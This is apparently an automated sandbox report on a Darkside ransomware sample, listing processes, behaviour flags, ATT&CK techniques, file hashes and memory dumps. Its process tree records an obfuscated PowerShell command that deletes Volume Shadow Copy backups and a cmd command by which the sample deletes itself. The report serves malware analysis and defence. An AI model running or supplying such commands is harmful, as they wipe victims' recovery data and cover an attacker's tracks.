PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3844	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3864	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3864	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3864	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3888	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3888	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3888	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3888	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3888	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3888	3616	chrome.exe	chrome.exe
PID 3616 wrote to memory of 3888	3616	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Darkside.exe
"C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Control Panel
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL
2⤵
- Deletes itself
PID:3516

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\SuspendOut.xps.6a2c0f68
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3128

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Desktop\SuspendOut.xps.6a2c0f68"
2⤵
- Suspicious use of SetWindowsHookEx
PID:3252

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.6a2c0f68.TXT
1⤵
- Opens file in notepad (likely ransom note)
PID:3572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3616

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6d59758,0x7fef6d59768,0x7fef6d59778
2⤵
PID:3628

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1240 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:2
2⤵
PID:3844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1532 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:8
2⤵
PID:3864

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1656 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:8
2⤵
PID:3888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2264 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
2⤵
PID:3140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2208 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
2⤵
PID:3148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1404 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:2
2⤵
PID:204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3696 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
2⤵
PID:2068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3804 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:8
2⤵
PID:2096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3920 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:8
2⤵
PID:2104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3468 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
2⤵
PID:2800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=580 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
2⤵
PID:2972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=2308 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:1
2⤵
PID:3412

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4172 --field-trial-handle=1308,i,6101144794580144496,8199415298406375541,131072 /prefetch:8
2⤵
PID:2420

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3328

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1796

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x520
1⤵
PID:836

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:3288

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
5fc038ae0b46e2e0623cb8e064a6e198

SHA1
123192dbb89574e23af206ca440850ed790b3e28

SHA256
f453ccaf8a89bc64190e633e7c9204bea54fa9f6a99a7ec1d566aeea8e94689a

SHA512
1812d4fe467d32180c6e8abfce419b025f247cfa09f525108cadf344ae5dfd554c5c873d0926e0f36802e7a29ebbd09d04898a4bb5d4f743c43379a1a280de6a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
f55ab70e74e7e0bd9f6c85ed05a0e9e7

SHA1
19d95512147f5541ec93d1a97c1ebdc3c6ca736e

SHA256
8124f148bcc43b6f60b796bdd96d503ba989560750e47fdc43926a8951daa3b3

SHA512
24c21f958bd6c12a99cbac9aa2e63944a99ee3692d45fa1c2082c93138377e5c3a30caa6d1b8fb378fbd904609e94e8e2c2a18568f0673c3ec4d8494a9a08d49

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\2881d971-4fec-4bfe-b097-a8c60dc0c387.tmp
Filesize
4KB

MD5
8e96efda541e1cddb0e882d03a9c51df

SHA1
f52f3e3e1e8c6f7c0a22b0a7d02354fb6fddb825

SHA256
1e18519a0507db0d080618361a857fcaa9002bf06ed15e854c5fe83c6625d7d5

SHA512
55e000eb824ecdb7a0321574eaba01a06de1dd79bddad1b0a3d798bc86108a3bb8c90605635197ccea768e38ab43b79e92fd8267722aa52594ed2dae38b40c33

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000002.dbtmp
Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
361B

MD5
2d724c38206b62c151cecf6756e721bc

SHA1
0e849b0a81d079150ed1b088d01d7c98b77a6032

SHA256
a6666f111f6139b3e674385855a1a350bb432d1427cf31b2b5cc7dff0901e9e1

SHA512
ca1c1c5ce27e0891467bcc7e26bb9e9fa577d22559cc41fa1f649a60db2c3709d4e2d258c41152b9bbd87c595554b7fb9557ff4592f099b424d279adfc326adb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
525B

MD5
f9e9ea2ca50c3426010eadc30c0676d8

SHA1
443c41ce4d7847ad8329ad852060e6e23360501d

SHA256
a51f5011e8da721fbc13cc7ad830d157f5eaa0ac3abf0bfecd5a3a179c6444b7

SHA512
34a0e538c980833409b11c01e88958d5faa190d4b1344693e719523b032a042f9d10eb759dcb439ba401676cdc391d6c552e5696f254c514d493aebddd0ca412

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
5KB

MD5
3ffa392a02061391ade4f051cfa3fdf0

SHA1
f70fc1e9aafe60869ad3cc0ff6a1db71ff598644

SHA256
8ef6e20764217c6ca68e41b3ae81729e15d6d682b27efb949f94c8f83c6bee46

SHA512
4f4924942b168962586d2962dec0bdfd5a36858a5d115c1be7fa1605a27794572b2985d40446e3f3117183e342bb3d2f2432670508afdd189f381f80609076c2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000004.dbtmp
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\cfa6340d-3445-4b86-9a60-405e55fe0171.tmp
Filesize
4KB

MD5
50e75c6face6d5eda07b4709838e16d4

SHA1
f6fb63c30572697a7c84d514ce2d83370dd7fa7e

SHA256
259e0edfb6e7f97a38793cb8584ee633304d2851f835a41aa7313d42cd73f5f0

SHA512
1fe062d57df766f975d48ce9d8475b12fee5b9b5e1fc2018af6396897674b3c504c125abda77f2443e07dca4006f90cd4a4163dcfe93dba065a291c682241fbe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
158KB

MD5
32008345b1bda97f725ec4d62760b0c2

SHA1
92e1e5116fd29d7b1ce8844ca9522fbf79e7f4d1

SHA256
7e75c015183b868508c73eb025aed1d0fe29dd3c522db031cea004f540f71d37

SHA512
8cd1850354a1476e2256e4a7ebeb87e2d66a925ee3022a98e8b91bc7ff7dd942d9d4a54659cf9d072b6b70c29a2614d6cc29d305aead0e3ee44d0f0cf726bc86

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab45AB.tmp
Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4709.tmp
Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
590a97f8fe343f2395257a87797b084a

SHA1
5beafe0c41811236d98fe596d5074afa4c4ff958

SHA256
c04c64a686640a00a04083d8e7ee55da8ed613e63b4d0211ac4e57562a944284

SHA512
935407dc2348921e983bd1dcdfd60b5e34f98b179c4f894a83f663e1fe3b9f29e57153f1bfd954e31ed5ea64ab9ce93dec75cee215e2dbb723fcdc980f355875

Download Submit
C:\Users\Admin\Desktop\README.6a2c0f68.TXT
Filesize
3KB

MD5
b58e2411168bbdbec635cf4001635db0

SHA1
c130cd9caaaa514a6b98c1168e10d44a989d191a

SHA256
652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

SHA512
87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

Download Submit
C:\Users\Admin\Desktop\SuspendOut.xps.6a2c0f68
Filesize
627KB

MD5
3ecfc2a20e61926aaa26bab53316b80a

SHA1
def04eed400904d8080d5946c50408673f98e049

SHA256
4145a60c2aab5a61c5b9de030f5d7e67df3c079175335676bde4c7b904378c3e

SHA512
c24d4f2585e45a37df61fb8f7a06a4809cc533fd2eedbc7b51adb4a09ef213ae8f3143bc8d3cec73f44e55d774e2d6a50aa627e15e7c50ac4dafa12bf79f32fa

Download Submit
C:\Users\Admin\README.6a2c0f68.TXT
Filesize
3KB

MD5
b58e2411168bbdbec635cf4001635db0

SHA1
c130cd9caaaa514a6b98c1168e10d44a989d191a

SHA256
652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

SHA512
87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\crashpad_3616_GSKUGKEJNGZXFIWZ
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1724-144-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/1724-142-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/1724-143-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/1724-141-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/1724-140-0x0000000002360000-0x0000000002368000-memory.dmp

Filesize
32KB

Download
memory/1724-139-0x000000001B180000-0x000000001B462000-memory.dmp

Filesize
2.9MB

Download
memory/1796-669-0x00000000027C0000-0x00000000027C1000-memory.dmp

Filesize
4KB

Download
memory/3288-670-0x0000000002820000-0x0000000002821000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads